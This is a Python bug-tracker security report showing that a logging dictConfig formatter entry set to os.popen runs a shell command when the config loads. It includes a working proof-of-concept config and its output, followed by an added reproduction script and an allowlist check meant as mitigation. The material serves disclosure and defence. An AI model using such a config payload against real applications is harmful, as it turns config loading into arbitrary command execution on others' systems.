[New-bugs-announce] [issue46251] logger.config.configure_formatter executes arbitrary code
MarkBaggett
report at bugs.python.org
Mon Jan 3 17:15:10 EST 2022
New submission from MarkBaggett <lo127001 at gmail.com>:
I know there are multiple warnings about the use of eval() in the listener. But _resolve() and resolve(), used by both fileConfig and dictConfig, also seem like they can be abused. Here is a working example.
$ ls /tmp/itworked
ls: cannot access '/tmp/itworked': No such file or directory
$ cat log.config
{
    "version": 1,
    "formatters": {
        "EXPLOIT": {
            "class": "os.popen",
            "format": "touch /tmp/itworked",
            "datefmt": "r",
            "style": 1
        }
    }
}
$ python calculator.py
/usr/lib/python3.8/subprocess.py:848: RuntimeWarning: line buffering (buffering=1) isn't supported in binary mode, the default buffer size will be used
self.stdout = io.open(c2pread, 'rb', bufsize)
WARNING:calculator.support_functions:Internet Confirmed.
WARNING:calculator.support_functions:Adder object exported!
WARNING:calculator.support_functions.adder:Set initial value to 0
WARNING:calculator:The result is 15
$ ls /tmp/itworked
/tmp/itworked
I could probably clean up that error message if I took 2 minutes to refresh my os.popen knowledge, but I think you get the point. Are you aware of this issue?
Thanks for all you do on this important module!
----------
messages: 409623
nosy: MarkBaggett
priority: normal
severity: normal
status: open
title: logger.config.configure_formatter executes arbitrary code
type: security
versions: Python 3.10
_______________________________________
Python tracker <report at bugs.python.org>
<https://bugs.python.org/issue46251>
_______________________________________
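The following is an added example, not code from the report or from CPython. It shows, in runnable form, why the formatter "class" key is a call sink (dictConfig resolves the dotted name and calls it as c(format, datefmt, style), which is exactly how os.popen ends up running the command at configuration time), and then a pre-check that rejects any "class" or "()" target that is not an allowlisted logging class. Assumptions: a POSIX shell is available for the os.popen reproduction, the marker file path is constructed in a temporary directory here, and the names SAFE_MODULES, SECTION_BASES, resolve_checked, check_config, is_rejected, safe_dict_config and benign_config are this example's own, not part of the logging API.

```python
# Added example, not from the bug report or CPython.  Part 1 reproduces the
# report with a temp-dir marker; part 2 vets a config before dictConfig sees it.
import importlib
import logging
import logging.config
import os
import tempfile
import time


def popen_formatter_config(shell_cmd):
    """Formatter section shaped like the report's log.config.  The report used
    "style": 1, which is the buffering=1 that triggers the subprocess
    line-buffering warning in its output; -1 is os.popen's default."""
    return {
        "version": 1,
        "disable_existing_loggers": False,
        "formatters": {
            "EXPLOIT": {
                "class": "os.popen",   # resolved, then called as c(fmt, datefmt, style)
                "format": shell_cmd,   # 1st positional arg of os.popen: the command
                "datefmt": "r",        # 2nd: mode
                "style": -1,           # 3rd: buffering
            }
        },
    }


def demonstrate_spawn():
    """Apply the config and report whether the shell command ran.
    Marker path is constructed for this example; POSIX shell assumed."""
    with tempfile.TemporaryDirectory() as tmpdir:
        marker = os.path.join(tmpdir, "itworked")
        logging.config.dictConfig(popen_formatter_config(f"echo x > '{marker}'"))
        # os.popen starts the shell and dictConfig drops the handle without
        # waiting, so poll briefly instead of assuming the file already exists.
        deadline = time.monotonic() + 5
        while not os.path.exists(marker) and time.monotonic() < deadline:
            time.sleep(0.05)
        return os.path.exists(marker)


# --- Part 2: only allowlisted logging classes may be resolved and called ----
SAFE_MODULES = ("logging", "logging.handlers")
SECTION_BASES = {
    "formatters": logging.Formatter,
    "filters": logging.Filter,
    "handlers": logging.Handler,
}


def resolve_checked(dotted, base, extra_modules=()):
    """Resolve 'module.Name' only if module is allowlisted and Name subclasses
    base.  The module is checked BEFORE importing: importing an attacker-chosen
    module already runs that module's top-level code."""
    module_name, _, attr = dotted.rpartition(".")
    if module_name not in SAFE_MODULES + tuple(extra_modules):
        raise ValueError(f"{dotted!r}: module {module_name!r} not allowlisted")
    obj = getattr(importlib.import_module(module_name), attr, None)
    if not (isinstance(obj, type) and issubclass(obj, base)):
        raise ValueError(f"{dotted!r} is not a {base.__name__} subclass")
    return obj


def check_config(config, extra_modules=()):
    """Vet every "()" factory and "class" entry that dictConfig would call.
    Returns the (section, name, dotted) entries that passed."""
    verified = []
    for section, base in SECTION_BASES.items():
        for name, entry in config.get(section, {}).items():
            for key in ("()", "class"):
                target = entry.get(key)
                if target is None:
                    continue
                if not isinstance(target, str):
                    # "()" may hold a live callable; dictConfig calls it as-is.
                    raise ValueError(f"{section}/{name}: non-string {key!r} entry")
                resolve_checked(target, base, extra_modules)
                verified.append((section, name, target))
    return verified


def is_rejected(config, extra_modules=()):
    """True if check_config refuses the config."""
    try:
        check_config(config, extra_modules)
    except ValueError:
        return True
    return False


def safe_dict_config(config, extra_modules=()):
    """Drop-in for dictConfig that runs the check first."""
    check_config(config, extra_modules)
    logging.config.dictConfig(config)


def benign_config():
    """Ordinary config that passes the check (constructed for this example)."""
    return {
        "version": 1,
        "disable_existing_loggers": False,
        "formatters": {"plain": {"class": "logging.Formatter",
                                 "format": "%(levelname)s %(message)s"}},
        "handlers": {"stderr": {"class": "logging.StreamHandler",
                                "formatter": "plain"}},
    }


if __name__ == "__main__":
    print("shell ran at config time:", demonstrate_spawn())
    print("exploit config rejected:", is_rejected(popen_formatter_config("id")))
    safe_dict_config(benign_config())
```

The check removes the primitive the report relies on, calling an arbitrary dotted callable with config-chosen arguments, but it does not make untrusted config safe: an allowlisted logging.FileHandler or SocketHandler still takes its filename or host and port from the same config, and the listen() path uses eval() as the report notes. Treat the allowlist as a guard for configs you already mostly trust, not as a sanitizer.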